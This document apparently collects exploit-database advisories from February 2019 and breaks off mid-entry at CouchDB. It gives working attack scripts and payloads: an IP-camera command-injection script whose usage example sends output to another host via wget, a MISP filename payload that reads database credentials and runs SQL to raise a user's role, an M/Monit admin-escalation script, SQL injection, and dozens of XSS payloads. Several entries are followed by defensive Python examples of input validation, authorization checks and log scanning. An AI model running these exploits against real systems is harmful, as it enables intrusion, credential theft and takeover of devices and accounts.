===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small teams.
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easily manage Projects, Tasks and People.
Customers interact using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET /qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script> HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387
import sys
import requests

if len(sys.argv) < 3:
    print("[-] Usage: python MasterIpCamRCE.py <ip> <cmd>")
    print("[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'")
    exit(1)

host = sys.argv[1]
command = sys.argv[2]

# CGI endpoints whose 'cmd' parameter reaches a shell unquoted
page = [
    "bconf.cgi",
    "ddns_start.cgi",
    "getddnsattr.cgi",
    "getinetattr.cgi",
    "getnettype.cgi",
    "getupnp.cgi",
    "getwifiattr.cgi",
    "getwifistatus.cgi",
    "inetconfig.cgi",
    "iptest.cgi",
    "listwifiap.cgi",
    "p2p.cgi",
    "paraconf.cgi",
    "scanwifi.cgi",
    "setadslattr.cgi",
    "setddnsattr.cgi",
    "setinetattr.cgi",
    "setwifiattr.cgi",
    "upnp_start.cgi",
    "wifimode.cgi",
    "wifitest.cgi",
]

for x in page:
    url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
    #url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
    print("[*] Attack on "+x)
    print("[+] Sending the payload")
    r = requests.get(url)
    if r.status_code == 200:
        print("[+] Exploit Success")
        break
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post
if (isset($_GET['post'])) {
    $post = $_GET['post'];
}
// $post is interpolated into the statement without validation or escaping
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))
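The same defect and its fix, added here as an illustration that is not part of the advisory or of CMSsite: get_post_vulnerable mirrors post.php above by interpolating the raw post parameter into the SQL string, and get_post_safe enforces the expected type and binds the value as a parameter. An in-memory SQLite table constructed below stands in for the posts table, and a boolean tautology is used as the injected input instead of the MySQL sleep() payload above, because SQLite has no sleep(). The function names and sample rows are my own.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the CMSsite `posts` table (in-memory, sample rows).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (post_id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(1, "Welcome"), (2, "Second post"), (3, "Unpublished draft")],
    )
    con.commit()
    return con


def get_post_vulnerable(con, post):
    # Mirrors post.php: the request parameter is pasted straight into the
    # statement, so SQL syntax inside it becomes part of the query.
    query = "SELECT post_id, title FROM posts WHERE post_id=%s" % post
    return con.execute(query).fetchall()


def get_post_safe(con, post):
    # Hardened form: enforce the expected type up front and bind the value as
    # a parameter. Returns None for input that is not a plain integer, which
    # the caller should turn into an HTTP 400 instead of running a query.
    try:
        post_id = int(post)
    except (TypeError, ValueError):
        return None
    return con.execute(
        "SELECT post_id, title FROM posts WHERE post_id=?", (post_id,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    tautology = "1 OR 1=1"  # constructed injection input
    print("vulnerable:", get_post_vulnerable(con, tautology))  # every row leaks
    print("safe:", get_post_safe(con, tautology))              # None: rejected
    print("safe, normal:", get_post_safe(con, "2"))
```

The type check alone would already stop this particular input, but the bound parameter is what makes the query safe for every input shape, including ones a regex would miss; use both.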
# -*- coding: utf-8 -*-
# Exploit Title: NBMonitor 1.6.5 - 'Key' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.5.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "NBMonitor.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NBMonitor.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Write anything in 'Name' field
# 6.- Paste clipboard in 'Key' field
# 7.- Click on button -> Ok
# 8.- Crashed
buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
    from base64 import b64encode
    from urllib.parse import quote_plus
    b64Data = b64encode(data.encode("utf-8"))
    urlEncode = quote_plus(b64Data)
    return urlEncode


def generate_payload(SQLRequest):
    payload = 'MISPPath="../../";'\
              'MISPPDB="$MISPPath/app/Config/database.php";'\
              'MySQLUUser=$(grep -o -P "(?<=\'login\' => \').*(?=\')" $MISPPDB);'\
              'MySQLRUser=${{MySQLRUser:-$MySQLUUser}};'\
              'MySQLUPass=$(grep -o -P "(?<=\'password\' => \').*(?=\')" $MISPPDB);'\
              'MySQLRPass=${{MySQLRPass:-$MySQLUPass}};'\
              'MISPDB=$(grep -o -P "(?<=\'database\' => \').*(?=\')" $MISPPDB);'\
              'mysql -u $MySQLRUser -p$MySQLRPass $MISPDB -e "{}"'
    return payload.format(SQLRequest)


def generate_exploit(SQLRequest, **kwargs):
    options = {
        "inputFile" : kwargs.get("input_file", "data"),
        "outputFile" : kwargs.get("output_file", "data2"),
        "payload" : encode_data(generate_payload(SQLRequest))
    }
    exploit = "; echo '{payload}'>{inputFile};"\
              "python3 -c 'import urllib.parse;"\
              'fd=open(\\"{outputFile}\\",\\"w\\");'\
              'fd.write(urllib.parse.unquote_plus(open(\\"{inputFile}\\").read()));'\
              "fd.close()';"\
              "base64 -d {outputFile}>{inputFile};"\
              "sh {inputFile};"\
              "rm {inputFile} {outputFile} #".format(**options)
    return exploit


def main():
    SQLRequest = "UPDATE users SET role_id=1 WHERE id = 2"
    print(generate_exploit(SQLRequest))


if __name__ == "__main__":
    main()
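Both the Master IP CAM cmd parameter earlier on this page and the MISP STIX filename above reach a shell unquoted, which is why backticks and ';' in them run as commands. The following is an added defensive counterpart, not code from either advisory or project: an allow-list check for a request-supplied filename, execution through an argument vector with no shell so metacharacters stay literal, and shlex.quote for the case where a shell command string cannot be avoided. The regex, the length cap and the use of echo as a stand-in for the real tool are my assumptions.

```python
import re
import shlex
import subprocess

# Allow-list for a name that will end up on a command line: letters, digits,
# dot, dash and underscore, no leading dot (which also blocks "..") and a
# length cap. Pattern and cap are assumptions chosen for this example.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._-]{0,127}$")


def is_safe_filename(name):
    """True only for names with no shell metacharacters or path separators."""
    return bool(_SAFE_NAME.match(name))


def run_argv(argv):
    """Run a program from an argument vector with no shell in between.

    Each list element reaches the child as exactly one argv entry, so ';',
    backticks and $(...) inside it are ordinary characters to the program.
    Returns the child's stdout.
    """
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


def shell_string_for(argv):
    """When a shell command line is unavoidable, quote every argument."""
    return " ".join(shlex.quote(arg) for arg in argv)


def handle_upload_name(name):
    """Model of the fixed server side: validate the request-supplied name, then
    hand it over as a single argument. `echo` stands in for the real tool."""
    if not is_safe_filename(name):
        raise ValueError("rejected filename: %r" % (name,))
    return run_argv(["echo", "processing", name]).strip()


if __name__ == "__main__":
    # Constructed input shaped like the STIX filename payload above.
    injected = "; echo injected > data; sh data #"
    print(is_safe_filename("report.xml"))                 # True
    print(is_safe_filename(injected))                     # False
    print(run_argv(["echo", "`id`" + injected]), end="")  # echoed back literally
    print(shell_string_for(["mysql", "-e", injected]))
```

The allow-list is the primary control; run_argv is what removes the shell from the data path entirely, and shell_string_for is a last resort for legacy code that must build a string, never a substitute for the first two.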
#!/usr/bin/env python3
"""
Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation
Author: Dolev Farhi
Vulnerable version: 2.0.151021
Link: https://mmonit.com
Date: 2/17/2019
"""
import sys
import requests

MMONIT_URL = 'http://ip.add.re.ss:8080'
MMONIT_USER = 'monit'  # Default built in unprivileged user
MMONIT_PASS = 'monit'

s = requests.Session()
s.get(MMONIT_URL + '/')
resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS})
if 'Invalid username and/or password' in resp.text:
    print('Error logging in')
    sys.exit(1)

zessionid = s.cookies.get_dict()['zsessionid']
headers = {
    'CSRFToken':zessionid,
}
resp = s.post(MMONIT_URL + '/admin/users/update',
              headers=headers,
              params={'CSRFTOKEN':zessionid,
                      'fullname':'john doe',
                      'password':MMONIT_USER,
                      'title':'',
                      'email':'',
                      'phone':'',
                      'mobile':'',
                      'imname':'',
                      'uname':MMONIT_PASS,
                      'imtype':None,
                      'admin':'on',
                      'oldpassword':'D9CFD4AF77E33817DE2160E0C1C7607C'
                      })
if resp.status_code == 200:
    print('Success! You are now M/Monit admin')
else:
    print('Something went wrong')
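The request above succeeds because the update endpoint trusts the submitted admin field rather than the caller's session. Added here as a defensive illustration, not M/Monit's code: a profile-update handler that takes the edited account and the privilege level from the authenticated session, keeps an allow-list of self-editable fields, and refuses a request from a non-admin that carries a privilege field. The field names reuse the form parameters from the request above; the session dict, the in-memory user store and the error type are assumptions, and password hashing is left out.

```python
# Profile fields a signed-in user may change on their own account (names taken
# from the form parameters in the request above).
SELF_EDITABLE = {"fullname", "title", "email", "phone", "mobile",
                 "imname", "imtype", "password"}
# Fields that grant privilege; only an administrator may set them.
ADMIN_ONLY = {"admin"}
# Transport-level fields that carry no profile data. 'uname' is here because
# it is only ever used to pick a target, never written as a profile value.
IGNORED = {"CSRFTOKEN", "oldpassword", "uname"}


class AuthorizationError(Exception):
    pass


def make_store():
    # Constructed user store standing in for the application's user table.
    return {
        "monit": {"admin": False, "fullname": "", "email": ""},
        "root": {"admin": True, "fullname": "Administrator", "email": ""},
    }


def update_user(store, session, form):
    """Apply a profile update.

    The authenticated session, never the submitted form, decides which account
    is edited and whether privilege fields may be set. A privilege field sent
    by a non-admin is refused outright rather than silently dropped, so the
    attempt surfaces in error logs.
    """
    actor = store[session["uname"]]
    if actor["admin"]:
        target = form.get("uname", session["uname"])   # admins may pick a user
        allowed = SELF_EDITABLE | ADMIN_ONLY
    else:
        target = session["uname"]                      # everyone else: self only
        allowed = SELF_EDITABLE
    if target not in store:
        raise AuthorizationError("unknown account %r" % (target,))
    forbidden = set(form) - allowed - IGNORED
    if forbidden:
        raise AuthorizationError("%s sent fields it may not set: %s"
                                 % (session["uname"], sorted(forbidden)))
    record = store[target]
    for name in allowed & set(form):
        value = form[name]
        record[name] = (value == "on") if name == "admin" else value
    return record


def attempt_update(store, session, form):
    """(True, record) on success, (False, reason) when refused."""
    try:
        return True, update_user(store, session, form)
    except AuthorizationError as exc:
        return False, str(exc)


if __name__ == "__main__":
    store = make_store()
    escalation = {"CSRFTOKEN": "t", "fullname": "john doe", "uname": "monit",
                  "admin": "on", "oldpassword": "h"}   # shape of the request above
    print(attempt_update(store, {"uname": "monit"}, escalation))   # (False, ...)
    print(store["monit"]["admin"])                                  # False
    print(attempt_update(store, {"uname": "root"}, {"uname": "monit", "admin": "on"}))
    print(store["monit"]["admin"])                                  # True
```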
===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: https://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: CVE-2019-8404
# Software Description: Small stock inventory management application for the web.
===========================================================================================
# POC:
# Sign in to the admin panel, then go to the inventory tab.
Switch to the products tab and create a new product.
Under the product image, click the browse button and select a file.
https://i.hizliresim.com/OvrOOn.jpg
When you save the product, the script file is uploaded to the server even
though an error is shown (for example, "service unavailable").
https://i.hizliresim.com/zjGqD4.jpg
Path to the uploaded file:
https://i.hizliresim.com/XMbpp5.jpg
# http://localhost/[PATH]/runtime/ProductModel/[FILE]
===========================================================================================
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################
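The qdPM 'type' probe at the top of this page and the Comodo GET cases XSS15 and XSS16 all arrive as a script tag inside a query string, URL-encoded or not, which makes them visible in ordinary access logs. Added here as a defensive example that is not part of either advisory: a checker that parses access-log lines, decodes each query parameter (twice, to catch double encoding) and flags values containing a script tag, an inline event handler or a javascript: URL. The log lines are constructed for this example (the request targets reuse URLs from this page, the client IPs and timestamps are invented), and the marker list is a starting point rather than a complete ruleset.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined-log shape). The request targets reuse
# the qdPM 'type' probe and the Comodo XSS15 URL from this page; client IPs,
# timestamps and the last two lines are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2019:10:01:02 +0000] "GET /qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script> HTTP/1.1" 200 5120
10.0.0.5 - - [18/Feb/2019:10:01:09 +0000] "GET /manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop HTTP/1.1" 200 2210
10.0.0.7 - - [18/Feb/2019:10:02:11 +0000] "GET /qdpm/index.php/configuration?type=tasks_columns_list HTTP/1.1" 200 5100
10.0.0.9 - - [18/Feb/2019:10:03:45 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Fragments that have no business in a query-string value. Deliberately a
# short starting list, not a complete XSS signature set.
XSS_MARKERS = [
    re.compile(r"<\s*script\b", re.I),     # <script ...>
    re.compile(r"\bon[a-z]+\s*=", re.I),   # onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),   # javascript: URLs
]


def suspicious_params(target):
    """Return [(param, decoded_value)] for query values that match a marker."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already removed one layer of encoding; decode again so a
        # double-encoded probe (%253C...) is still seen. Only the decoded copy
        # is inspected, the original value is left as logged.
        decoded = unquote_plus(value)
        if any(marker.search(decoded) for marker in XSS_MARKERS):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Parse each line and collect one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue   # unparsable line: skipped here, worth counting in production
        target = match.group("target")
        for name, value in suspicious_params(target):
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "path": urlsplit(target).path,
                "param": name,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("%(ip)s %(path)s param=%(param)s value=%(value)r" % finding)
```

POST bodies, which carry most of the Comodo cases above, never reach an access log; detecting those needs the application's own input logging or a WAF in front of it, and the same marker logic applies there.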
##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based - Create Database
URL
http://127.0.0.1:5984/_utils/#/_all_dbs
PAYLOAD
<img src=x onerror=alert(1)>
<input id="js-new-database-name" type="text" class="input-xxlarge"
placeholder="Name of database" value="<img src=x onerror=alert(1)>">
#################################################################################
XSS2 | DOM Based & Stored - Add Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
